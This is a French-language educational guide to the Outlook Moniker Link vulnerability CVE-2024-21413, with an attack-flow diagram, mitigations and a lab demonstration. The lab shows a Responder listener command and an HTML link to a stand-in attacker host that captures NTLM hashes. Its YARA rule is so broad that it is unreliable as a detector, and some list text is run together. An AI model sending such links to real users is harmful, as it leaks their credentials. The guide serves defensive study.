
Guide éducatif sur CVE-2024-21413, la vulnérabilité Outlook zero-click Moniker Link, couvrant le flux d'attaque, la capture d'identifiants NTLM, la détection avec YARA et les stratégies d'atténuation.
CVE-2024-21413, communément appelée la vulnérabilité du lien Moniker, est une faille de sécurité critique dans Microsoft Outlook qui permet aux attaquants de divulguer les identifiants utilisateur sans nécessiter aucune interaction.
Contrairement aux attaques de phishing traditionnelles, cette vulnérabilité peut être déclenchée simplement en prévisualisant un courriel, ce qui la rend particulièrement dangereuse dans les environnements professionnels.
Le problème provient de la façon dont Outlook traite les liens moniker, provoquant des tentatives d'authentification involontaires vers des systèmes contrôlés par l'attaquant.
Il est essentiel de comprendre les concepts suivants :
Un mécanisme spécifique à Windows qui permet aux applications de référencer des ressources externes en utilisant des protocoles tels que :
file://unc://\\attacker-server\share
Utilisé pour accéder aux ressources partagées sur un réseau. Dans cette vulnérabilité, il est abusé pour forcer les demandes d'authentification.
La Vue Protégée d'Outlook est conçue pour isoler les contenus potentiellement dangereux. Cette vulnérabilité contourne cette protection, permettant l'accès à des ressources externes.
Création de la charge utile
file://attacker-server/share) dans un courriel.Livraison
Déclenchement
Traitement automatique
Demande d'authentification
Exposition des identifiants
[Attaquant]
|
| 1. Envoyer un courriel conçu
v
[Outlook de la victime]
|
| 2. Traiter automatiquement le lien moniker
v
[Système Windows]
|
| 3. Tentative d'authentification NTLM
v
[Serveur de l'attaquant]
|
| 4. Capture du haché NTLM
v
[Abus d'identifiants / Mouvement latéral]
⚠️ Effectuer uniquement dans des environnements de laboratoire contrôlés
sudo responder -I eth0
<a href="file://attacker-ip/share">Open Document</a>
[SMB] NTLMv2 Hash captured
User: victim
Une règle de détection a été développée par Florian Roth pour identifier les tentatives d'exploitation impliquant des liens moniker.
rule Outlook_MonikerLink_CVE_2024_21413
{
meta:
description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
author = "Florian Roth"
reference = "CVE-2024-21413"
strings:
$a = "file://"
$b = "\\\\"
condition:
any of them
}
file:// et basés sur UNCCVE-2024-21413 démontre comment des comportements système profondément intégrés (comme l'authentification automatique) peuvent être exploités via des entrées apparemment inoffensives telles que des liens de courriel.
💡 Recommandation : Reproduisez cette vulnérabilité dans un laboratoire virtuel (par exemple, VM Windows + VM attaquant) pour comprendre pleinement la chaîne d'attaque et les stratégies défensives.